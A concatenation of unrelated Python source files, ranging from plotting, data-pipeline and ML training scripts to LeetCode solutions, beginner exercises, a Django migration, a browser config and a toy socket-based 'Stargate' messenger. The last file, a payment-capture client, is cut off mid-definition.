chordwidth2 *= np.clip(0.4 + (dtheta1 - 2*pad) / (15*pad), 0.2, 1)
chordwidth *= np.clip(0.4 + (dtheta2 - 2*pad) / (15*pad), 0.2, 1)
rchord = radius * (1-chordwidth)
rchord2 = radius * (1-chordwidth2)
verts += [polar2xy(rchord, end1), polar2xy(rchord, start2)] + verts2
verts += [
polar2xy(rchord2, end2),
polar2xy(rchord2, start1),
polar2xy(radius, start1),
]
codes += [
Path.CURVE4,
Path.CURVE4,
Path.CURVE4,
Path.CURVE4,
Path.CURVE4,
Path.CURVE4,
Path.LINETO,
Path.CURVE4,
Path.CURVE4,
Path.CURVE4,
Path.LINETO,
Path.CURVE4,
Path.CURVE4,
Path.CURVE4,
Path.LINETO,
Path.CURVE4,
Path.CURVE4,
Path.CURVE4,
Path.CURVE4,
Path.CURVE4,
Path.CURVE4,
]
if ax is not None:
path = Path(verts, codes)
if use_gradient:
# find the start and end points of the gradient
points, min_angle = None, None
if dtheta1 < dtheta2:
points = [
polar2xy(radius, start1),
polar2xy(radius, end2),
]
min_angle = dtheta1
else:
points = [
polar2xy(radius, end1),
polar2xy(radius, start2),
]
min_angle = dtheta1
# make the patch
patch = patches.PathPatch(path, facecolor="none",
edgecolor="none", lw=LW)
ax.add_patch(patch) # this is required to clip the gradient
# make the grid
x = y = np.linspace(-1, 1, 100)
meshgrid = np.meshgrid(x, y)
gradient(points[0], points[1], min_angle, color, cend, meshgrid,
patch, ax, alpha)
else:
patch = patches.PathPatch(path, facecolor=color, alpha=alpha,
edgecolor=color, lw=LW)
idx = 16
ax.add_patch(patch)
return verts, codes
def self_chord_arc(start, end, radius=1.0, chordwidth=0.7, ax=None,
color=(1,0,0), alpha=0.7):
start, end, verts, codes = initial_path(start, end, radius, chordwidth)
rchord = radius * (1 - chordwidth)
verts += [
polar2xy(rchord, end),
polar2xy(rchord, start),
polar2xy(radius, start),
]
codes += [
Path.CURVE4,
Path.CURVE4,
Path.CURVE4,
]
if ax is not None:
path = Path(verts, codes)
patch = patches.PathPatch(path, facecolor=color, alpha=alpha,
edgecolor=color, lw=LW)
ax.add_patch(patch)
return verts, codes
|
import sys
from kapacitor.udf.agent import Agent, Handler, Server
from kapacitor.udf import udf_pb2
import logging
logging.basicConfig(level=logging.DEBUG, format='%(asctime)s %(levelname)s:%(name)s: %(message)s')
logger = logging.getLogger()
class GroupBuffer(object):
def __init__(self):
self._points = []
def append(self, point):
self._points.append(point)
def process(self, strip_prefix, drop_tags, ignore_values_from):
self._fields = {}
self._tags = {}
for entry in self._points:
entry_name = entry.tags['__name__']
if entry_name not in ignore_values_from:
if strip_prefix and entry_name.startswith(strip_prefix):
entry_name = entry_name[len(strip_prefix):]
self._fields[entry_name] = entry.fieldsDouble['value']
for tag,value in entry.tags.items():
if tag not in drop_tags:
self._tags[tag] = value
if not self._fields:
# There has to be at least one field in order for influxdb to accept the series.
self._fields = { 'unused_field': 1 }
class KubeStateMetricsJoinToSinglePoint(Handler):
class state(object):
def __init__(self):
self.time = None
self.group_buffers = {}
def update(self, point):
#print >> sys.stderr, ("POINT: %r" % point)
if not self.time:
self.time = point.time
group_buffer = self.group_buffers.get(point.group, GroupBuffer())
group_buffer.append(point)
self.group_buffers[point.group] = group_buffer
def process(self, *args, **kwargs):
for group_buffer in self.group_buffers.values():
group_buffer.process(*args, **kwargs)
def reset(self):
self.time = None
self.group_buffers.clear()
def __init__(self, agent):
self._agent = agent
self._strip_prefix = None
self._drop_tags = []
self._ignore_values_from = []
self._begin_response = None
self._state = KubeStateMetricsJoinToSinglePoint.state()
def info(self):
response = udf_pb2.Response()
response.info.wants = udf_pb2.STREAM
response.info.provides = udf_pb2.STREAM
response.info.options['stripPrefix'].valueTypes.append(udf_pb2.STRING)
response.info.options['dropTag'].valueTypes.append(udf_pb2.STRING)
response.info.options['ignoreValueFrom'].valueTypes.append(udf_pb2.STRING)
return response
def init(self, init_req):
success = True
msg = ''
for opt in init_req.options:
if opt.name == 'stripPrefix':
self._strip_prefix = opt.values[0].stringValue
elif opt.name == 'dropTag':
self._drop_tags.append(opt.values[0].stringValue)
elif opt.name == 'ignoreValueFrom':
self._ignore_values_from.append(opt.values[0].stringValue)
response = udf_pb2.Response()
response.init.success = success
response.init.error = msg[1:]
return response
def snapshot(self):
response = udf_pb2.Response()
response.snapshot.snapshot = ''
return response
def restore(self, restore_req):
response = udf_pb2.Response()
response.restore.success = False
response.restore.error = 'not implemented'
return response
def begin_batch(self, begin_req):
raise Exception("not supported")
def end_batch(self, end_req):
raise Exception("not supported")
def flush(self):
self._state.process(self._strip_prefix, self._drop_tags, self._ignore_values_from)
for group_id, group_buffer in self._state.group_buffers.items():
response = udf_pb2.Response()
response.point.group = group_id
response.point.time = self._state.time
for tag,value in group_buffer._tags.items():
response.point.tags[tag] = value
for field,value in group_buffer._fields.items():
response.point.fieldsDouble[field] = value
self._agent.write_response(response)
self._state.reset()
def point(self, point):
# Points come through in bursts, all from a particular scrape share the same time.
# So once the time changes, we can flush the current cache.
if self._state.time and self._state.time != point.time:
self.flush()
# Add point to cache.
self._state.update(point)
if __name__ == '__main__':
agent = Agent()
handler = KubeStateMetricsJoinToSinglePoint(agent)
agent.handler = handler
logger.info("Starting agent")
agent.start()
agent.wait()
logger.info("Agent finished")
|
from rest_framework import status
from rest_framework.exceptions import ValidationError
from rest_framework.views import exception_handler
def custom_exception_handler(exc, context):
if isinstance(exc, ValidationError) and any(
'unique' in err_codes for err_codes in exc.get_codes().values()):
exc.status_code = status.HTTP_409_CONFLICT
return exception_handler(exc, context)
|
# -*- coding: utf-8 -*-
"""Logistic_Regression ML.ipynb
Automatically generated by Colaboratory.
Original file is located at
https://colab.research.google.com/drive/1lMtFkIGC4EIQ5UNVEs1ob-zUOBImv7fs
"""
import pandas as pd
df = pd.read_csv("/content/drive/MyDrive/Social_Network_Ads.csv")
df
x = df.iloc[:,2:4].values
y = df.iloc[:,4].values
x
y
from sklearn.preprocessing import StandardScaler
sc = StandardScaler()
from sklearn.model_selection import train_test_split
x_train,x_test,y_train,y_test = train_test_split(x,y, test_size = 0.25, random_state=0)
x_train = sc.fit_transform(x_train)
x_test = sc.fit_transform(x_test)
x_test
from sklearn.linear_model import LogisticRegression
log = LogisticRegression(random_state=0)
log.fit(x_train,y_train)
pred_y = log.predict(x_test)
pred_y
y_test
from sklearn import metrics
metrics.accuracy_score(y_test,pred_y)
metrics.confusion_matrix(y_test,pred_y)
log.predict(sc.transform([[32,70000]]))
|
test = {
'name': 'Question',
'points': 1,
'suites': [
{
'cases': [
{
'code': r"""
>>> list2
[7, 14, 21, 28, 35, 42, 49]
""",
'hidden': False,
'locked': False
},
{
'code': r"""
>>> list_divisible(5, 19, 2)
[6, 8, 10, 12, 14, 16, 18]
""",
'hidden': False,
'locked': False
},
{
'code': r"""
>>> list_divisible(5, 56, 7)
[7, 14, 21, 28, 35, 42, 49]
""",
'hidden': False,
'locked': False
}
],
'scored': True,
'setup': '',
'teardown': '',
'type': 'doctest'
}
]
}
|
def trigger_breakpoint(owner=None):
pass
|
#coding=gb18030
'''
Copyright(c) Funova
FileName : UIOptimizeChecker.py
Creator : pengpeng
Date : 2014-12-25 11:11
Comment :
ModifyHistory :
'''
__version__ = '1.0.0.0'
__author__ = 'pengpeng'
import os
import sys
import re
import string
import csv
import argparse
# import yaml
# from PIL import Image
import Image
g_TestSuite = r"UIOptimizeChecker"
g_RootPath = r"E:\WorkSpace\gunsoul_mobile\game\project\game-xx"
g_UIPath = r"E:\WorkSpace\gunsoul_mobile\game\project\game-xx\Assets\resourcex\ui\altas"
g_TabFile = r"UIMetaCheckerConfig.tab"
g_LogTab = r"logs\UIMetaCheckerLog.tab"
g_LogFile = r"logs\UIOptimizeChecker.log"
g_JUnitLog = r"logs\UIOptimizeChecker.xml"
def FindFiles(dir, out, filter):
if not os.path.exists(dir):
print "path not exists."
return
listdir = os.listdir(dir)
for file in listdir:
filename = os.path.join(dir, file)
if os.path.isfile(filename):
ext = os.path.splitext(filename)[1]
# print ext
if ext.lower() in filter or ext == '':
# print filename
out.append(filename)
elif os.path.isdir(filename):
if file == ".svn":
continue
out = FindFiles(filename, out, filter)
return out
def ReadTabFile(filepath):
reader = csv.reader(open(filepath, "r"), delimiter="\t")
i = 0
res = []
for row in reader:
i = i + 1
if i > 1:
res.append(row[0])
return res
pass
def Analysis(file_path, keys_prefix, keys_postfix):
"""Extract the path from the give file.
Return a set.
"""
fileobj = file(file_path, "r")
filecontent = fileobj.read() # read the content, this is also for lua special
fileobj.close()
outset = set()
regx = re.compile(r"(%s[/|\\].+?\.(%s))" % (keys_prefix, keys_postfix), re.I)
results = re.findall(regx, filecontent)
for result in results:
if len(result) > 0:
if "\t" not in result[0]:
afterformat = string.replace(result[0], "\\\\", "\\")
afterformat = string.replace(afterformat, "/", "\\")
outset.add(afterformat)
return outset
def Check_rule_1(i, f_png, rules = ""):
"""Check the rule of meta file is valid or not.
Return a bool: True -> no error, or otherwise.
"""
bRet = True
szName = ("Path: %s \n") % (f_png[len(g_RootPath)+1:])
szMsg = ""
szJMsg = ""
logresult = []
JUnitResult = {}
if not os.path.exists(f_png):
bRet = False
szMsg = ("%s: %s") % (szName, " -- not exists.")
szJMsg = ('''
<testcase classname="%s" caseId="%s" result="%s" name="%s">
<failure type="Error">
</failure>
</testcase>
''') % (i, i, bRet, szName)
return bRet, szMsg, szJMsg
else:
# 1. Get the size of the png
img = Image.open(f_png)
# print f[:-4] + keys_postfix
# print img.size
area = img.size[0] * img.size[1]
# 2. Get the size of the sub in the pefab png.
f_prefab = f_png[:-4] + keys_postfix
if os.path.exists(f_prefab):
png_subs = []
fileobj = file(f_prefab, "r")
lines = fileobj.readlines()
fileobj.close()
# index = 0
# prepare regx
regx1 = re.compile(r"name: (\w+)")
regx2 = re.compile(r"width: (\d+)")
regx3 = re.compile(r"height: (\d+)")
# for line in lines:
for index in xrange(0,len(lines) - 1):
# print lines[index]
results = re.findall(regx1, lines[index])
if results and len(results) > 0:
# print results[0]
# index = index + 3
if lines[index + 3] and lines[index + 4]:
results2 = re.findall(regx2, lines[index + 3])
results3 = re.findall(regx3, lines[index + 4])
if (results2 and len(results2) > 0) and (results3 and len(results3) > 0):
# print results2[0]
width = int(results2[0])
height = int(results3[0])
area_t = width * height
png_subs.append(area_t)
# index = index + 1
sub_area = 0
for item in png_subs:
sub_area = sub_area + item
# print area, sub_area
ratio = float(sub_area) / float(area)
logresult = [f_png[len(g_RootPath)+1:], area, sub_area, ratio]
# print ratio
if 1.00 > ratio > 0.85:
bRet = True
szMsg = "Thie png file no need to be optimized."
szJMsg = ('''
<testcase classname="%s" caseId="%s" result="%s" name="%s"/>
''') % (i, i, "Passed", szName)
pass
else:
bRet = False
szMsg = "Thie png file need to be optimized. Total area(%s), Actual area(%s), Ratio(%.2f%%)." % (area, sub_area, ratio * 100)
szJMsg = ('''
<testcase classname="%s" caseId="%s" result="%s" name="%s">
<failure type="Error">
%s
</failure>
</testcase>
''') % (i, i, "Failed", szName + szMsg, szMsg)
return bRet, szMsg, szJMsg, logresult
pass
if __name__ == "__main__":
import time
print("begin at: %s" % (time.strftime('%Y-%m-%d -- %H:%M:%S',time.localtime(time.time()))))
startTime = time.strftime('%Y-%m-%d %H:%M:%S',time.localtime(time.time()))
parser = argparse.ArgumentParser()
parser.add_argument('-r')
parser.add_argument('-d')
parser.print_help()
args = parser.parse_known_args()[0]
if args.d:
g_RootPath = args.r
g_UIPath = args.d
print g_UIPath
bResult = True
szResMsg = ""
szJUnitMsg = ""
nTotalFailedCount = 0
str1 = ""
keys_postfix = ".prefab"
logfileobj = open(g_LogFile, "w")
junitfileobj = open(g_JUnitLog, "w")
logtabobj = open(g_LogTab, "w")
logresult = []
files = []
files = FindFiles(g_UIPath, files, [".png"])
if files:
i = 0
for f in files:
i = i + 1
bRet, szMsg, szJMsg, temp = Check_rule_1(i, f)
if not bRet:
bResult = False
szResMsg = szResMsg + szMsg
szJUnitMsg = szJUnitMsg + szJMsg
logresult.append(temp)
else:
szJUnitMsg = szJUnitMsg + szJMsg
# if bResult:
# # print "Success."
# str1 = "Passed"
# else:
# # print szResMsg
# str1 = "Failed"
# Test
# i = 0
# f1 = r"E:\workspace\gunsoul_mobile\game\project\game-xx\Assets\resourcex\ui\altas\beibao\nxbeibao.png"
# f2 = r"E:\workspace\gunsoul_mobile\game\project\game-xx\Assets\resourcex\ui\altas\beibao\nxbeibao.prefab"
# Check_rule_1(i, f1, f2)
# logfileobj.write(szResMsg)
# logfileobj.close()
# logtabobj
logtabobj.write("filename\tarea\t(KB)\tsub_area\t(KB)\tratio\n")
for item in logresult:
print item
logtabobj.write("%s\t%s\t%s\t%s\t%s\t%.2f%%\n" % (item[0], item[1], item[1] / 1024, item[2], item[2] / 1024, item[3] * 100))
logtabobj.close()
endTime = time.strftime('%Y-%m-%d %H:%M:%S',time.localtime(time.time()))
junitfileobj.write(r'<?xml version="1.0" encoding="utf-8"?>')
junitfileobj.write(r'<testsuite classname="%s" name="%s" result="%s" startTime="%s" endTime="%s" errorInfo="">'
% ("Resource Check", g_TestSuite, str1, startTime, endTime))
junitfileobj.write(r'<testsuite>')
junitfileobj.write(szJUnitMsg)
junitfileobj.write(r'</testsuite>')
junitfileobj.write(r'</testsuite>')
junitfileobj.close()
else:
print "path is None."
print("end at: %s" % (time.strftime('%Y-%m-%d -- %H:%M:%S', time.localtime(time.time()))))
|
# Python practice exercises
# Course: Automate the Boring Stuff with Python
# Developer: Valeriy B.
# Intro
# Password check
def password():
passwordFile = open('practice/secretPasswordFile.txt')
secretPassword = passwordFile.read()
yourPassword = input("Type the pasword: ")
if yourPassword == secretPassword:
print("Access granted")
if yourPassword == "12345":
print ("That password is not good at all")
else:
print("Access denied")
# Dictionaries and structuring data
# Character count
def character_count(st):
count = {}
# My method
for c in st:
count[c] = st.count(c)
return count
# Other method
for character in st:
count.setdefault(character, 0)
count[character] = count[character] + 1
print(count)
# Pretty character count
import pprint
def pretty_character_count(st):
count = {}
for c in st:
count[c] = st.count(c)
return pprint.pformat(count)
message = "It was a bright cold day in April, and the clocks were striking thirteen."
# Tic-Tac-Toe Board
def tic_tac_toe_board():
# Game board dictionary
the_board = {
"top_l": " ", "top_m": " ", "top_r": " ",
"mid_l": " ", "mid_m": " ", "mid_r": " ",
"bot_l": " ", "bot_m": " ", "bot_r": " "
}
# Printing game board
def game_board(board):
print(board["top_l"] + "|" + board["top_m"] + "|" + board["top_r"])
print("------------")
print(board["mid_l"] + "|" + board["mid_m"] + "|" + board["mid_r"])
print("------------")
print(board["bot_l"] + "|" + board["bot_m"] + "|" + board["bot_r"])
print("------------")
game_board(the_board)
board_space = ""
player = ""
count = 1
# Looping for the 9 times
while count != 10:
# Stop the game if user input is 'q'
if board_space == "q":
break
# Selecting the player 'X' or 'O'
if count % 2 == 0:
board_space = input("Player 'O' - Choose a space on the board: ")
player = "O"
else:
board_space = input("PLayer 'X' - Choose a space on the board: ")
player = "X"
# Verifying if user input space is in the board dictionary
if board_space in the_board:
# Verifying if the board spot is not already taken
if the_board[board_space] == " ":
the_board[board_space] = player
count += 1
game_board(the_board)
else:
print("This space is already taken")
else:
print("Input space could not be found")
# Manipulating strings
# Picnic Table
def printPicnic(itemDict, leftWidth, rightWidth):
print("PICNIC ITEMS".center(leftWidth + rightWidth, "-"))
for k, v in itemDict.items():
print(k.ljust(leftWidth, ".") + str(v).rjust(rightWidth))
picnicItems = {"sandwiches": 4, "apples": 12, "cups": 4, "cookies": 8000}
# Regular expressions
def isPhoneNumber(text):
result = 0
if text.split("-")[0].isdigit() and len(text.split("-")[0]) == 3:
result += 1
if text.split("-")[1].isdigit() and len(text.split("-")[1]) == 3:
result += 1
if text.split("-")[2].isdigit() and len(text.split("-")[2]) == 4:
result += 1
if text[3] == "-" and text[7] == "-":
result += 1
if len(text) == 12:
result += 1
if result == 5:
return "It is a phone number"
else:
return "It is not a phone number"
|
"""
@author - Anirudh Sharma
"""
def romanToInt(s: str) -> int:
# Dictionary of roman numerals
roman_map = {'I': 1, 'V': 5, 'X': 10, 'L': 50, 'C': 100, 'D': 500, 'M': 1000}
# Length of the given string
n = len(s)
# This variable will store result
num = roman_map[s[n - 1]]
# Loop for each character from right to left
for i in range(n - 2, -1, -1):
# Check if the character at right of current character is bigger or smaller
if roman_map[s[i]] >= roman_map[s[i + 1]]:
num += roman_map[s[i]]
else:
num -= roman_map[s[i]]
return num
if __name__ == '__main__':
print(romanToInt('III'))
print(romanToInt('IV'))
print(romanToInt('IX'))
print(romanToInt('LVIII'))
print(romanToInt('MCMXCIV'))
|
class Solution:
def XXX(self, head: ListNode) -> ListNode:
if head == None or head.next== None: # 考虑空链表或者有头空链表
return head
p = head # 定义一个指针,指向头结点
while True:
if p.val == p.next.val: # 找到重复结点元素
p.next = p.next.next # 直接改变指向,删除该元素
else:
p = p.next # 否则继续往后遍历
if p.next==None: # 遍历到链表尾部停止
break
return head # 返回链表头结点
|
from PIL import Image
import pickle
from torch.utils.data import Dataset, DataLoader
import torch
from torchvision import transforms
import os
class shirtDataset_train(Dataset):
def __init__(self, path, transform=None):
# read the h5 file
self.full_data = None
with open(path, 'rb') as f:
self.full_data = pickle.load(f)
self.numpair = len(self.full_data)
self.numpair = 1000
# imagedata
self.full_imagedata = []
for i in range(self.numpair):
self.full_imagedata.append(Image.fromarray(self.full_data[i][0]))
# self.full_imagedata.append(Image.fromarray(self.full_data[i][1]))
self.transform = transform
def __len__(self):
# the length of valid frames
return self.numpair
def __getitem__(self, idx):
output = self.full_imagedata[idx]
if self.transform:
output = self.transform(output)
return output
class shirtDataset_test(Dataset):
def __init__(self, path, transform=None):
# read the h5 file
self.full_data = None
with open(path, 'rb') as f:
self.full_data = pickle.load(f)
self.numpair = len(self.full_data) - 1000
# imagedata
self.full_imagedata = []
for i in range(self.numpair):
self.full_imagedata.append(Image.fromarray(self.full_data[i+1000][0]))
# self.full_imagedata.append(Image.fromarray(self.full_data[i+1000][1]))
self.transform = transform
def __len__(self):
# the length of valid frames
return self.numpair
def __getitem__(self, idx):
output = self.full_imagedata[idx]
if self.transform:
output = self.transform(output)
return output
if __name__ == '__main__':
path = 'data/shirt_dataset_20191217_20200109_no_unf.pkl'
image_size = 64
batchsize = 32
transform = transforms.Compose(
[
transforms.Resize(image_size),
transforms.CenterCrop(image_size),
transforms.RandomHorizontalFlip(),
transforms.ToTensor(),
transforms.Normalize((0.5, 0.5, 0.5), (1, 1, 1)),
]
)
dataset = shirtDataset_train(path, transform=transform)
loader = DataLoader(dataset, shuffle=True, batch_size=batchsize, num_workers=4)
loader = iter(loader)
data = next(loader)
print(data.shape)
|
config.load_autoconfig(False)
config.source("gruvbox.py")
c.content.default_encoding = "utf-8"
c.colors.webpage.prefers_color_scheme_dark = True
c.content.images = False
c.content.javascript.enabled = False
c.content.cookies.accept = "never"
c.content.webrtc_ip_handling_policy = "disable-non-proxied-udp"
c.tabs.last_close = "close"
c.tabs.show = "never"
config.bind("q", "quit")
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# File: Ampel-core/ampel/template/ChannelWithProcsTemplate.py
# License: BSD-3-Clause
# Author: valery brinnel <firstname.lastname@gmail.com>
# Date: 16.10.2019
# Last Modified Date: 05.01.2022
# Last Modified By: valery brinnel <firstname.lastname@gmail.com>
from ampel.log.AmpelLogger import AmpelLogger
from typing import Any
from ampel.config.builder.FirstPassConfig import FirstPassConfig
from ampel.abstract.AbsChannelTemplate import AbsChannelTemplate
from ampel.model.ChannelModel import ChannelModel
class ChannelWithProcsTemplate(AbsChannelTemplate):
""" Convenience class allowing channel definitions to include processes. """
# Note: not using list[ProcessModel] on purpose since embedded processes
# might need template processing as well
process: list[dict[str, Any]]
def get_channel(self, logger: AmpelLogger) -> dict[str, Any]:
return self.dict(include=ChannelModel.get_model_keys())
def get_processes(self, logger: AmpelLogger, first_pass_config: FirstPassConfig) -> list[dict[str, Any]]:
# Note: not enforcing channel selection for t3 processes
# as these could require template processing first
return [
self.transfer_channel_parameters(p)
for p in self.process
]
|
# Longest Increasing Subsequence
class Solution(object):
def lengthOfLIS(self, nums):
"""
:type nums: List[int]
:rtype: int
"""
# tails[i] = the smallest tail of all increasing subseq with length i+1
# for example given [4, 5, 6, 3],
# tails[1] = 5 (from [4, 5], [5, 6])
tails = [0] * len(nums)
size = 0
for num in nums:
i, j = 0, size
# find the smallest tail for tails[i]
while i < j:
m = (i + j) / 2
if tails[m] < num:
i = m + 1
else:
j = m
tails[i] = num
size = max(size, i + 1)
return size
if __name__ == '__main__':
seq = [2, 1, 5, 3, 6, 4, 8, 9, 7]
print Solution().lengthOfLIS(seq)
|
"""
Tests for application package.
"""
|
from .generator_discriminator_v1 import (StyleGAN1Discriminator,
StyleGANv1Generator)
from .generator_discriminator_v2 import (StyleGAN2Discriminator,
StyleGANv2Generator)
from .mspie import MSStyleGAN2Discriminator, MSStyleGANv2Generator
__all__ = [
'StyleGAN2Discriminator', 'StyleGANv2Generator', 'StyleGANv1Generator',
'StyleGAN1Discriminator', 'MSStyleGAN2Discriminator',
'MSStyleGANv2Generator'
]
|
'''
Store the references to the dependent data information for a given dataProxy
'''
class DataHistory(object):
def __init__(self, proxy):
self.proxy = proxy
self.history = dict()
self.updateDataRef()
def updateDataRef(self):
self.history[self.proxy.type] = self.proxy.getData()
def updateHistory(self, historyObj):
for key in historyObj.history:
self.history[key] = historyObj.history[key]
@staticmethod
def checkHistory(*args):
'''
check whether all data proxies in arg list have conflicting histories
'''
historySummary = dict()
# print "Existing keys for data history: ", historySummary.keys()
# print " History Summary = ", historySummary.keys()
for proxy in args:
# print " Proxy = ", proxy.getData()
if not proxy.valid():
print ("DataHistory: checkHistory proxy is invalid")
return False
# print "proxy keys = ", proxy.history.history.keys()
for key in proxy.history.history:
if key in historySummary:
# print "k1: ", key
# print "k2: ", historySummary.keys()
# print key, proxy.history.history[key]
if proxy.history.history[key] is not historySummary[key]:
print ("DataHistory:checkHistory history disagree")
return False
else:
historySummary[key] = proxy.history.history[key]
# print "historySummary:", historySummary
return True
|
# Generated by Django 3.2 on 2021-05-10 19:52
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('network', '0001_initial'),
]
operations = [
migrations.AddField(
model_name='account',
name='account_type',
field=models.CharField(default='None', max_length=40),
preserve_default=False,
),
migrations.AddIndex(
model_name='account',
index=models.Index(fields=['username', 'account_type'], name='network_acc_usernam_1b4fde_idx'),
),
]
|
from typing import List, NoReturn
from _thread import start_new_thread
import time
import tempfile
import os
import base64
from .stargate_listen_loop import StargateListenLoop
from .stargate_send_loop import StargateSendLoop
from .helpers import *
from .event_hook import EventHook
class StargateNetwork():
"""Class for representing a stargate on internet
Must be powered on before sending of receiving call
This expose those events :
- self.onDialingConnection = Start connecting to a stargate
- self.onDialingConnected = If connection is ok
- self.onDialingDisconnection = If connection is ko
- self.onIncomingConnection = Start receiving from a stargate
- self.onIncomingConnected = Connected from a stargate
- self.onIncomingDisconnection = Disconnected from a stargate
- self.onIncomingDataText = Text received from a stargate
- self.onIncomingDataFile = File received from a stargate
"""
def __init__(self, host: str = '', port: int = 24801) -> NoReturn:
self.host = host
self.port = port
self.__listenloop = None
self.__sendLoop = None
self.__TimerLoop = None
self.powered = False
self.connected = False
self.ipConnectedTo = None
self.disablelisten = False
self.disablesend = False
self.reservedSequences = {
"38.38.38.38.38.38.38": "127.0.0.1"
}
self.onDialingConnection = EventHook()
self.onDialingConnected = EventHook()
self.onDialingDisconnection = EventHook()
self.onIncomingConnection = EventHook()
self.onIncomingConnected = EventHook()
self.onIncomingDisconnection = EventHook()
self.onIncomingDataText = EventHook()
self.onIncomingDataFile = EventHook()
self.otherSequence = None
self.dialFinish = False
def __str__(self) -> str:
return f"Stargate { self.getAddressOnNetwork() if self.powered and not self.disablelisten else None} \r\n\t Power state : {self.powered}\r\n\t Connection status : {self.connected} to {self.ipConnectedTo} \r\n\t Can Call : {not self.disablesend}\r\n\t Can Receve : {not self.disablelisten}"
def powerOn(self) -> NoReturn:
"""Power On the stargate
Instantiate ListenLoop Thread and configure the events
"""
if(self.powered):
return
self.powered = True
if not self.disablelisten:
self.__listenloop = StargateListenLoop(self)
self.__listenloop.onIncomingConnection += self.incomingConnection
self.__listenloop.onIncomingConnected += self.incomingConnected
self.__listenloop.onIncomingDisconnected += self.incomingDisconnected
self.__listenloop.configureConnection()
self.__listenloop.start()
def powerOff(self) -> NoReturn:
"""Power Off the stargate
Close and delete Listen and Send threads
"""
if not self.powered:
return
if not self.disablelisten and self.__listenloop is not None:
self.__listenloop.stop()
self.__listenloop = None
if not self.disablesend and self.__sendLoop is not None:
self.__sendLoop.stop()
self.__sendLoop = None
self.powered = False
def getAddressOnNetwork(self) -> List[List[int]]:
"""Return the int sequence for this gate over the network
Returns:
List[int]: The stargate sequence
"""
d = dict()
IpLan = self.__listenloop.getLocalAddress()
d["LAN"] = IpToStargateCode(SequenceToListInt(IpLan))
IpWan = self.__listenloop.getExternalAdress()
d["WAN"]= IpToStargateCode(SequenceToListInt(IpWan))
return d
def dial(self, sequence: str) -> NoReturn:
"""Dial sequence.
If ok -> connect to another stargate
Args:
sequence (str): the stargate sequence to dial
"""
if not self.powered or self.connected or self.__sendLoop is not None:
return
# seach it in reserved sequences
self.otherSequence = sequence
print(sequence)
if(sequence in self.reservedSequences):
ip = self.reservedSequences[sequence]
else:
sequence = SequenceToListInt(sequence)
ip = StargateCodeToIp(sequence)
ip = ListIntToSequence(ip)
# creating the connection
self.__sendLoop = StargateSendLoop(self)
self.__sendLoop.onOutConnectionStart += self.dialingStart
self.__sendLoop.onOutConnected += self.outConnected
self.__sendLoop.onOutConnectionError += self.outConnectionError
self.__sendLoop.onOutDisconnected += self.outDisconnected
self.__sendLoop.dial(ip, self.port)
def disconnect(self) -> NoReturn:
"""Disconnect from another stargate
"""
if not self.powered or not self.connected or self.__sendLoop is None:
return
self.__sendLoop.stop()
self.__sendLoop = None
self.connected = False
def __resetConnectionInfo(self) -> NoReturn:
"""Reset connection infos
"""
self.ipConnectedTo = None
self.connected = False
def dialingStart(self, sequence: str) -> NoReturn:
"""When dialing start
Args:
sequence (str): sequence to dial
"""
self.dialFinish = False
self.onDialingConnection.fire(
self.otherSequence, self.dialSequenceFinish)
def dialSequenceFinish(self) -> NoReturn:
"""Callback for when the dial sequence is finish
"""
self.dialFinish = True
def outConnected(self, sequence: str) -> NoReturn:
"""When out connected
Args:
sequence (str): sequence to dial
"""
self.ipConnectedTo = sequence
self.connected = True
self.onDialingConnected.fire()
start_new_thread(self.__timerClose, ())
def outConnectionError(self) -> NoReturn:
"""When out fail to connect
"""
print("out connection error")
self.__resetConnectionInfo()
def outDisconnected(self) -> NoReturn:
"""When out disconnect
"""
self.__resetConnectionInfo()
self.onDialingDisconnection.fire()
def incomingConnection(self, sequence) -> NoReturn:
"""When in connect
Args:
sequence (str): sequence from dial
"""
if(sequence in self.reservedSequences.values()):
sequence = list(self.reservedSequences.keys())[list(
self.reservedSequences.values()).index(sequence)]
else:
sequence = SequenceToListInt(sequence)
sequence = IpToStargateCode(sequence)
sequence = ListIntToSequence(sequence)
self.dialFinish = False
self.onIncomingConnection.fire(sequence, self.dialSequenceFinish)
def incomingConnected(self, sequence) -> NoReturn:
""""When in connected
Args:
sequence (str): sequence from dial
"""
self.connected = True
self.ipConnectedTo = sequence
self.onIncomingConnected.fire()
def incomingDisconnected(self) -> NoReturn:
"""When out disconnect
"""
self.__resetConnectionInfo()
self.onIncomingDisconnection.fire()
def sendDataText(self, msg: str) -> NoReturn:
"""Send text
Args:
msg (str): text to send
"""
if not self.powered or not self.connected or self.__sendLoop is None:
return
self.__sendLoop.sendTroughGate("text.tp", msg)
def sendDataFile(self, fileName: str) -> NoReturn:
"""Send file in base64 encoding
Args:
fileName (str): file name in absolute path
"""
if not self.powered or not self.connected or self.__sendLoop is None:
return
try:
file = open(fileName, "rb")
datas = file.read()
file.close()
datas = (base64.b64encode(datas)).decode('ascii')
fileName = os.path.basename(fileName)
self.__sendLoop.sendTroughGate(fileName, datas)
except Exception as e:
print(e)
pass
def receiveDataText(self, msg: str) -> NoReturn:
"""Receive text
Args:
msg (str): the text received
"""
self.onIncomingDataText.fire(msg)
def receiveDataFile(self, fileName: str, payload: str) -> NoReturn:
"""Receive file
Args:
fileName (str): name of the file
payload (str): contend in base64 encoding
"""
path = os.path.join(os.getcwd(), "Gate Room")
if not os.path.exists(path):
os.makedirs(path)
try:
file = open(os.path.join(path, fileName), "wb")
datas = base64.b64decode(payload.encode('ascii'))
file.write(datas)
file.close()
self.onIncomingDataFile.fire(fileName)
except:
pass
def __timerClose(self) -> NoReturn:
"""Timer for 38 minuts disconnection
"""
delay = 2280 # (38*60 seconds)
startTime = time.time()
while startTime + delay > time.time() and self.connected:
time.sleep(1)
if(self.connected):
self.disconnect()
|
# -*- coding: utf-8 -*-
"""
@author: mwahdan
"""
from dialognlu import BertNLU
from dialognlu.readers.goo_format_reader import Reader
train_path = "../data/snips/train"
val_path = "../data/snips/valid"
train_dataset = Reader.read(train_path)
val_dataset = Reader.read(val_path)
save_path = "../saved_models/joint_bert_model"
epochs = 1 #3
batch_size = 64
config = {
"model_type": "bert"
}
nlu = BertNLU.from_config(config)
nlu.train(train_dataset, val_dataset, epochs, batch_size)
print("Saving ...")
nlu.save(save_path)
print("Done")
|
class Capture(object):
def __init__(self, client):
self.client = client
def create_capture(self, payment_id, **kwargs):
headers = self.client._get_private_headers()
payload = dict()
payload.update(kwargs)
endpoint = '/payments/{}/captures'.format(payment_id)
return self.client._post(self.client.URL_BASE + endpoint, json=payload, headers=headers)
def retrieve_all_captures(self, payment_id):
